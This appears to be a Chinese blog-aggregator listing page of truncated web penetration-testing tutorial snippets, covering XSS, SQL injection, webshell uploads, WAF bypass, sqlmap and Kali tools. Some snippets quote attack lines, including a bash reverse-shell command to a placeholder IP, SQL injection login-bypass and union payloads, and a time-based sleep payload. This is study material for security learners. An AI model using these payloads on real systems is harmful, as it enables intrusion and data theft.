【WEB渗透】

Kali Linux Web 渗透测试视频教—第二十课-利用kali linux光盘或者usb启动盘破解windows密码...

KaliLinuxWeb渗透测试视频教—第二十课-利用kalilinux光盘或者usb启动盘破解windows密码文/玄魂目录KaliLinuxWeb渗透测试视频教—第二十课-利用kalilinux光盘或者
weixin_34101229·2020-07-29 12:16

Kali(渗透工具):25---攻击性手动Web渗透测试框架TIDoS-Framework

免责声明:TIDoS是作为攻击性Web应用程序审核框架提供的。它具有内置模块,可以揭示Web应用程序中可能被恶意利用的潜在错误配置和漏洞。因此,对于此工具包引起的任何误用或损害,作者和其他贡献者概不负责。一、下载与安装前提:您需要将Python版本默认为2.x。但是,从Python2到Python3的迁移工作已经在进行中①全局安装下载使用下面的命令下载gitclonehttps://github.
江南、董少·2020-07-29 11:23

【网络安全】从零开始的CTF生活

题目主要包含逆向、漏洞挖掘与利用、Web渗透、密码、取证、隐写、安全编程等类别2、攻防模式(Attack-Defense):参赛队伍在网络空间互相进行攻
小哈里·2020-07-29 10:17

Web渗透中的反弹Shell与端口转发的奇淫技巧

奇淫技巧0x00前言在做渗透测试时,遇到linux服务器,直观想到反弹shell到本地进行溢出等提权尝试,⽽而其中涉及到的反弹/转发/代理的种种方式,就在此文做一简单小结.0x01反弹shell1)Bash部分linux发行版中的Bash可以直接反弹一个shell到指定ip端口bash-i>&/dev/tcp/x.x.x.x/23330>&12)NetCatNetcat反弹shell也是常用兵器,
大方子·2020-07-29 10:01

渗透测试之信息收集(上篇)

强调安全不简单强调防御,而应该从攻击者的角度,思考安全,所以web渗透测试犹为重要,即“未知攻,焉之防”。既然是攻击者的角度思考防御,那么攻击的手段是多种多样的。
碧血照丹心·2020-07-29 07:45

Web渗透信息收集篇

信息收集主要是收集服务器的配置信息和网站的敏感信息,主要包括域名信息、子域名信息、目标网站信息、目标网站真实IP、目录文件、开放端口和服务、中间件信息、脚本语言等等等。结合各路大佬的收集经验,菜鸟总结了8种信息收集的方式,有不足之处,欢迎赐教,欢迎斧正。个人感觉重点是顺手的工具、有IP代理池、日常收集的强大的字典、清晰可见的思维导图和多次的实战经验。一收集域名信息1.whois查询whois(读作
爱上卿Ooo·2020-07-29 05:23

web渗透测试之信息收集

目录信息收集一.域名信息搜集1.域名介绍2.whois介绍3.whois作用4.whois查询方式二.子域名信息搜集1.子域名介绍2.子域名搜集的作用2.子域名搜集方法三.web站点信息搜集1.CMS指纹识别2.网站敏感目录和文件四.端口信息搜集1.端口介绍2.端口信息搜集方法3.常见端口攻击五.敏感信息搜集1.敏感信息搜集的必要性2.搜索的基本方式六.真实IP地址搜集1.CDN介绍2.判断CDN
黑是黑客的黑·2020-07-29 05:01

web渗透测试中WAF绕过讲解(一)

---恢复内容开始---0x01前言许多Hacker总是生存在与WAF的不断抗争之中的,厂商不断过滤,Hacker不断的骚操作绕过。WAF与Hacker总是在斗智斗勇,经过长时间的发展,近年越来越多的Hacker投入到与WAF进行对抗,相对应的绕过方法也被大量的暴露出来,笔者今日就先进行个小小的科普先来说说WAF是什么。0x02什么是WAF?简单的来说它是一个Web应用程序防火墙他的功能是执行一系
ZDH5362·2020-07-29 04:46

web渗透--19--跨站脚本攻击(XSS)

1、漏洞名称存储型XSS跨站脚本,反射型XSS跨站脚本2、漏洞描述跨站脚本攻击的英文全称是CrossSiteScript,为了和样式表区分,缩写为XSS。发生的原因是网站将用户输入的内容输出到页面上,在这个过程中可能有恶意代码被浏览器执行。跨站脚本攻击它指的是恶意攻击者往Web页面里插入恶意JavaScript代码,当用户浏览该页之时,嵌入其中Web里面的JavaScript代码会被执行,从而达到
随 亦·2020-07-28 23:58

WEB渗透之SQL盲注

漏洞等级:高漏洞风险:会使攻击者远程查看、修改或删除数据库内条目和表单N-Base分类:远程命令执行----SQL注入漏洞描述:SQL注入是一种WEB程序的漏洞,通过注射,攻击者可以获得数据库中存储的数据,造成机密数据的外泄。SQL注入攻击(SQLinjection),是发生于应用程序至数据库层的安全漏洞。简而言之,是在输入的数据字符串之中夹带SQL指令,在安全不达标的程序中,开发者忽略了检查,那
沙漠网管·2020-07-28 22:23

2017-2018-2 20155303『网络对抗技术』Final:Web渗透获取WebShell权限

2017-2018-2『网络对抗技术』Final:Web渗透获取WebShell权限————————CONTENTS————————一.Webshell原理1.什么是WebShell2.WebShell
weixin_33711647·2020-07-28 17:19

WEB渗透SQL注入【3】[access数据库注入](2)

SQL注入的分类很多,不同的人也会将注入分成不同的种类,下面笔者将介绍一下常见的分类。注意:此文章中标点符号在页面中显示可能会转成中文的,自己测试时候语句中的标点一律使用英文输入法状态下的。1、判断注入:select*fromproductwhereid=1406and1=1//真条件页面正常select*fromproductwhereid=1406and1=2//假条件返回空select*fr
司徒荆·2020-07-28 12:16

web渗透【7】XSS跨站脚本漏洞详解(1)

目录一、XSS漏洞基础讲解二、JavaScript基础知识三、XSS分类一、XSS漏洞基础讲解XSS介绍:跨站脚本攻击(CrossSiteScripting),为了不和层叠样式表(CascadingStyleSheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意的Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶
司徒荆·2020-07-28 12:16

web渗透【11】phpmyadmin写shell的三种方法

查看phpMyAdmin能否自定义导出文件目录的权限 showglobalvariableslike"%secure%";   //查询secure_file_priv配置secure_file_prive=null//不允许导入导出数据到目录secure_file_priv=c:\\www//允许导入导出数据到指定目录secure_file_priv=''//允许导入导出数据到任意目录secur
司徒荆·2020-07-28 12:16

渗透测试职业规划-三省吾身

1.熟悉web渗透测试步骤、方法、流程,具备独立开展渗透工作的能力2.熟悉主流Web框架,熟悉代码
white-night·2020-07-28 11:33

·web渗透测试-从入门到放弃-03暴力破解验证码绕过

不安全的验证码客户端绕过我们先输入一个正确的验证码,然后回到burpsuite看有无抓包发现,burpsuite没有抓到包,然后,输入正确的验证码,发现burpsuite抓到了数据包它这里提交了账号、码和验证码。我们再来看看页面的源码,看看它这个验证码验证是不是在前端做的,在页面右键,查看页面源代码。拖动到最下面900多行的时候,发现有一段js的代码。可以看到,所有验证码的逻辑是通过js代码生成的
精神小火子·2020-07-28 03:41

【Kali Web渗透测试】手动漏洞挖掘—SQL注入 猜测数据库列名、表名、库名、字段内容

1.列名、表名、库名'anduserisnull--+'andtable.userisnull--+'anddb.table.userisnull--+用burp截获httpGET请求,发送到repeater,变量加$,load字典(字典可从kali中获取(find/-name*column*.txt))'and(selectcount(*)fromtable)>0--+//猜数据库里其它的表2.
Dalvin_jean·2020-07-27 21:27

linux tar压缩解压缩命令 dpkg命令

这次博客就先写做杂项题经常遇到的linux系统下一些语法,下次博客认认真真写web渗透
夜车星繁·2020-07-15 16:02

Kali Linux Web渗透测试手册(第二版) - 1.2 - Firefox浏览器下安装一些常用的插件

翻译来自:掣雷小组成员信息:**thr0cyte,****Gr33k,****花花,****小丑,**R1ght0us,7089bAt,第一章内容大纲一.配置KALILinux和渗透测试环境在这一章,我们将覆盖以下内容:1.1在Windows和Linux上安装VirtualBox1.1创建一个KaliLinux虚拟机1.1更新和升级KaliLinux1.2为渗透测试配置web浏览器(即在Firef
weixin_34192732·2020-07-15 05:04

Kali Linux Web渗透测试手册(第二版) - 1.1 - 渗透测试环境搭建

翻译来自:掣雷小组成员信息:thr0cyte,博客链接:http://thr0cyte.xyz/Gr33k,博客链接:http://www.zhanghuijun.top/花花,博客链接:http://to0ls.cn/小丑,博客链接:https://www.tcp.red/R1ght0us,博客链接:http://www.r1ght0us.xyz/7089bAt,只有此公众号,一定要关注哦,慢慢
weixin_30622181·2020-07-15 03:38

Kali Linux Web渗透测试手册(第二版) - 1.1 - Firefox浏览器下安装一些常用的插件

一.配置KALILinux和渗透测试环境在这一章,我们将覆盖以下内容:l在Windows和Linux上安装VirtualBoxl创建一个KaliLinux虚拟机l更新和升级KaliLinuxl为渗透测试配置web浏览器(即在Firefox浏览器下安装一些常用的插件)l创建一个属于自己的靶机l配置网络使虚拟机正常通信l了解靶机上易受攻击的web应用程序介绍在第一章中,我们将介绍如何准备我们的Kali
weixin_30300225·2020-07-15 02:59

渗透测试(一)

web渗透web应用架构设计到的组件WebBrowser/Client(通常为我们的浏览器)WebServer(通常为网站所在服务器)Webapp(通常为部署网站的后台应用)DB(数据库,数据存储所在)
内敛的王十六·2020-07-14 21:54

一个简单的Web渗透(文件上传漏洞)

本篇文章仅供学习参考,切勿用作非法用途。进入正题本来想写的粗略一点,但是回想起来自己当初学习的时候,一个小问题都能纠结半天,所以本白决定从开天辟地开始写起,今天这个渗透是利用文件上传的漏洞,这里采用最广泛的头像上传图片的漏洞进行渗透。首先渗透肯定是需要工具的,所以您需要准备以下工具:1:burpsuit.(主要是使用Proxy模块抓包)2:firefox浏览器(个人喜好,主要使用代理功能)3:中国
穿着女装写代码·2020-07-14 20:53

web渗透—— SQL基于GET POST注入

0x00前言之前我们学习了这些知识。0x01小知识1.万能登录1'or1=1#2.判断字段数uname=123'orderby2#&passwd=&submit=Submit3.联合查询uname=123'unionselect1,2#&passwd=&submit=Submit4.查询数据库具体信息uname=123'unionselectversion(),database()#&passwd
Bubble_zhu·2020-07-14 18:19

web渗透-robots.txt的用途

web渗透过程中,前期的信息收集时,robots.txt是一个很重要的目录,可以帮助我们查看网站的敏感路径、敏感文件等,对于robots.txt,你知道多少呢?
cacheyu·2020-07-14 03:58

web应用程序安全与风险

web应用程序安全与风险目录web应用程序安全与风险web渗透测试概述web应用程序发展历程web应用优点web应用程序安全(缺点)漏洞举例不完善的身份验证措施不完善的访问控制措施SQL注入跨站点脚本XSS
温柔小薛·2020-07-13 20:51

这里有一份最新的课程分享清单,收集好久了,请查收

(课程下载地址见文末)实战Web渗透测试视频课程北大青鸟Linux云计算运维开发视频Linux应用系统开发2018达内JAVA课程WEB前端攻城狮Pythonflask构建微信小程序订餐系统Go语言实战抽奖系统马哥
qiuyant·2020-07-13 09:25

web渗透环境搭建

一、为什么要搭建环境?为了更好的模拟黑客攻击,为专业的安全测试人员提供合法的环境。二、搭建DVWA网站1、名词翻译:DamnVulnerableWebApplication(DVWA):可恶的易受攻击的web应用程序2、名词解释:是一个用来进行安全脆弱性鉴定的PHP/Mysql的web应用,旨在为安全人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。3
a753159456258·2020-07-13 02:18

Web渗透测试从入门到放弃

渗透测试概念梳理渗透测试是什么?渗透测试并没有一个标准的定义,国外一些安全组织达成共识的通用说法是:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法,简称----走黑客的路,让黑客无路可走。渗透测试的分类有哪些?渗透测试基本分黑盒测试和白盒测试黑盒测试也称外部测试是指对基础设施不知情的情况下进行测试。黑盒测试比较费时费力,同时要求渗透测试者具备较高的技术能力白盒测试也称
DragonSkyAF·2020-07-13 00:28

Kali linux 学习笔记(五十五)Web渗透——CSRF 2020.3.31

前言CSRFcross-siterequestforgery与XSS相比XSS:利用用户对站点的信任,攻击者通过注入程序来修改网站来使用户浏览器被重定向等CSRF:利用站点对已经身份认证的用户的信任,攻击者伪造一个链接误导用户点击链接来使用用户的身份认证来访问服务器1、简介功能结合社工在身份认证会话过程中实现供给修改账号密码、个人信息(email、收货地址)发送伪造的业务请求(网银、购物、投票)关
思源湖的鱼·2020-07-12 14:11

Kali linux 学习笔记(四十七)Web渗透——漏洞挖掘之目录遍历和文件包含 2020.3.24

前言本节学习目录遍历和文件包含的漏洞1、准备dvwa:192.168.1.118kali:192.168.1.116设置dvwa配置文件可以进行远程文件包含测试root@metasploitable:vim/etc/php5/cgi/php.ini;Whethertoallowinclude/requiretoopenURLs(likehttp://orftp://)asfiles.allow_u
思源湖的鱼·2020-07-12 14:11

Kali linux 学习笔记(五十二)Web渗透——XSS 2020.3.30

前言本节学习XSS跨站脚本漏洞1、XSS简介命名与Java原因无关,完全出于市场原因使用最广的客户端脚本语言通过WEB站点漏洞,向客户端交付恶意执行代码,实现对客户端的攻击目的攻击有注入客户端脚本代码盗取cookie重定向使用场景直接嵌入html:alert('XSS');元素标签事件:图片标签:其他标签:,,andDOM对象,篡改页面内容漏洞形成的根源服务器对用户提交的数据过滤不严提交给服务器的
思源湖的鱼·2020-07-12 14:11

Kali linux 学习笔记(五十四)Web渗透——beef 2020.3.30

前言本节学习beef在此做些简单的介绍安装和使用可以参考https://www.cnblogs.com/xuanhun/p/4203143.html1、beef简介Beefbrowserexploitationframework生成、交付paylaodRuby语言编写服务器端:管理hooked客户端客户端:运行与客户端浏览器的Javascript脚本(hook)浏览器攻击面应用普遍转移到B/S架构
思源湖的鱼·2020-07-12 14:40

Kali linux 学习笔记(四十四)Web渗透——扫描工具之burpsuite 2020.3.20

前言burpsuiteweb安全工具中的瑞士军刀统一的集成工具发现全部现代web安全漏洞portswigger公司开发所有工具共享一个能处理并显示http消息的可扩展框架1、安装https://blog.csdn.net/HACKETTx/article/details/103786249https://blog.csdn.net/Iifuleyou/article/details/9073386
思源湖的鱼·2020-07-12 14:40

Kali linux 学习笔记(四十三)Web渗透——扫描工具之OWASP_ZAP 2020.3.19

前言OWASP_ZAP全球最受欢迎的免费安全工具之一,由数百名国际志愿者积极维护它可以帮助您在开发和测试应用程序时自动查找Web应用程序中的安全漏洞它也是经验丰富的测试者用于手动安全测试的好工具。比之前学习的所有工具都优秀不可或缺的工具1、安装国内链接:http://www.owasp.org.cn/官网链接:https://www.owasp.org/index.php/OWASP_Zed_At
思源湖的鱼·2020-07-12 14:40

Kali linux 学习笔记(五十一)Web渗透——sqlmap自动注入 2020.3.28

前言sqlmap开源sql注入漏洞检测、利用工具功能检测动态页面中get/post参数、cookie、http头数据榨取文件系统访问操作系统命令执行xss漏洞检测五种漏洞检测技术基于布尔的盲注检测:'and1=1基于时间的盲注检测:'and(select*from(select(sleep(20)))a)--+基于错误的检测基于UNION联合查询的检测:适用于通过循环直接输出联合查询结果,否则只显
思源湖的鱼·2020-07-12 14:40

Kali linux 学习笔记(四十)Web渗透——扫描工具之skipfish 2020.3.17

前言Skipfish是一款主动的Web应用程序安全侦察工具它通过执行递归爬取和基于字典的探测来为目标站点准备交互式站点地图最终的地图然后用来自许多活动(但希望是不中断的)安全检查的输出来注释该工具生成的最终报告旨在作为专业Web应用程序安全评估的基础优点高速:纯C代码,高度优化的HTTP处理,最小的CPU占用空间-轻松实现响应目标的每秒2000个请求易于使用:启发式支持各种古怪的Web框架和混合技
思源湖的鱼·2020-07-12 14:39

Kali linux 学习笔记(三十七)Web渗透——http 2020.3.16

前言本节开始学习web渗透本节简单学习http知识和侦查工具httrackweb攻击面networkOSwebserverappserverdatabasebrowser1、HTTP相关知识HTTP协议基础无内建的机密性安全机制嗅探或代理截断可查看全部明文信息
思源湖的鱼·2020-07-12 14:39

WEB渗透——文件上传漏洞(一)

文件上传漏洞(一)环境准备:OWASP_Broken_Web_Apps——靶机Kali_Linux-2018.2-vm-amd64——攻击机文件上传漏洞原理:制作PHP文件——一句话木马chopper就是密码利用文件上传漏洞,原本是要求上传image,但却可以上传PHP文件。上传成功后在网页加载该文件,将…/…/hackable/uploads/Xshell.php复制到URL地址栏后缀访问后会跳
果子哥丶·2020-07-11 19:04

BurpSuite抓包改包上传

http://sec.chinabyte.com/464/12671464.shtmlBurpsuite是由portswigger开发的一套用于Web渗透测试的集成套件,它包含了spider,scanner
myths_0·2020-07-11 13:32

web渗透测试检测列表

针对web的安全问题,建议通过以下相关的检查点,来进行对web系统的测试,以避免发生安全问题,下面的安全漏洞检测点可供参考。序号检查内容描述1收集web相关信息,开放端口信息,服务信息等2严禁增/删/改防火墙iptables,私自开通高危端口3检查Flash跨域策略文件crossdomain.xml是否合法4检查是否有CSRF漏洞,根据系统条件进行检测5信息泄露漏洞安全性检查(例如test.cgi
YeMaQingYu·2020-07-11 00:36

Kali linux 学习笔记(五十三)Web渗透——XSSer 2020.3.30

前言本节学习XSSer一个用来实施XSS的工具1、XSSer简介支持命令行和GUI绕过服务器端输入筛选启动xsser#命令行启动xsser–gtk#GUI界面-u指定URLxsser-u"http://192.168.1.102/dvwa/vulnerabilities/"-gGET请求时使用,内容是当前页面的本层路径-g"xss_r/?name="-pPOST请求时使用-s统计多少次请求–rev
思源湖的鱼·2020-07-10 19:36

浅谈跨站脚本攻击与防御

xss漏洞是web渗透测试中最常见而又使用最灵活的一个漏洞,近期在拜读了《白帽子讲web安全》、《Web实战篇》、《XSS跨站脚本攻击剖析与防御》等几部佳作后,决定整理关于Xss漏洞的一些知识,并以本篇作为记录
Alex8917·2020-07-09 22:03

web渗透之——任意代码执行漏洞

漏洞原理当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能够控制这个字符串,将造成代码注入漏洞在php中:eval,assert,将字符串当成代码执行preg_replace("/wslp/e","$xr",“wslp”);用第二个参数的执行结果替换第三个参数里的第一个参数指定的值漏洞形成如果被执行的字符串是通过前端参数传过来的攻击代码,或者数据库里被植入攻击代码数据,就会形成漏洞漏
卖N孩的X火柴·2020-07-09 00:39

WEB渗透测试中回显的一些技巧

原文首发:看雪论坛[原创]WEB渗透测试中回显的一些技巧-『WEB安全』-看雪安全论坛在很多场景中,WEB是渗透测试的一个相对容易的入口。
看雪学院·2020-07-08 05:52

一个人的武林:内网渗透测试思路(二)

写在前面跟web渗透(上一篇)不同,内网渗透需要更多的随机性和突破口,情况较为复杂,遇到障碍,有时可以换种思路突破,很多时候则无奈的只能止步于此。下面分享一些自己总结的内网渗透经验。
Xysoul·2020-07-06 09:33

kali linux metasploit的web渗透测试(二)-内网火狐浏览器渗透拿权限

这一章,介绍如何利用metasploit进行火狐浏览器的渗透拿权限,需要在内网环境下需要利用的技术是:可以使用ettercap(dns欺骗)或者mitmf(插入一段html地址),这两项技术就不再这里介绍与操作了,如何操作,请自行百度!利用的模块有:exploit/multi/browser/firefox_webidl_injection,exploit/firefox/local/exec_s
limit_anonymous·2020-07-05 18:27

常见Web源码泄露总结

git源码泄漏.DS_Store文件泄漏网站备份压缩文件SVN导致文件泄露WEB-INF/web.xml泄露CVS泄漏Bazaar/bzr工具推荐参考背景本文主要是记录一下常见的源码泄漏问题,这些经常在web
「已注销」·2020-07-05 03:03

安全学习概览——恶意软件分析、web渗透、漏洞利用和挖掘、内网渗透、IoT安全分析、区块链、黑灰产对抗...

1基础知识1.1网络熟悉常见网络协议:https://www.ietf.org/standards/rfcs/1.2操作系统1.3编程2恶意软件分析2.1分类2.1.1木马2.1.2Botnet2.1.3挖矿2.1.4勒索软件2.1.5后门2.1.6病毒2.1.7蠕虫2.2外部资源•VirusTotalhttps://www.virustotal.com/#/home/upload•样本下载htt
djph26741·2020-07-04 14:46

dnsenum 实战用途

软件介绍dnsenum是一款非常强大的域名信息收集工具,该开发者是一个精通web渗透测试的安全人员,并对DNS信息收集有着非常丰富的经验。
diechusi8056·2020-07-04 14:11
上一页 13 14 15 16 17 18 19 20 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他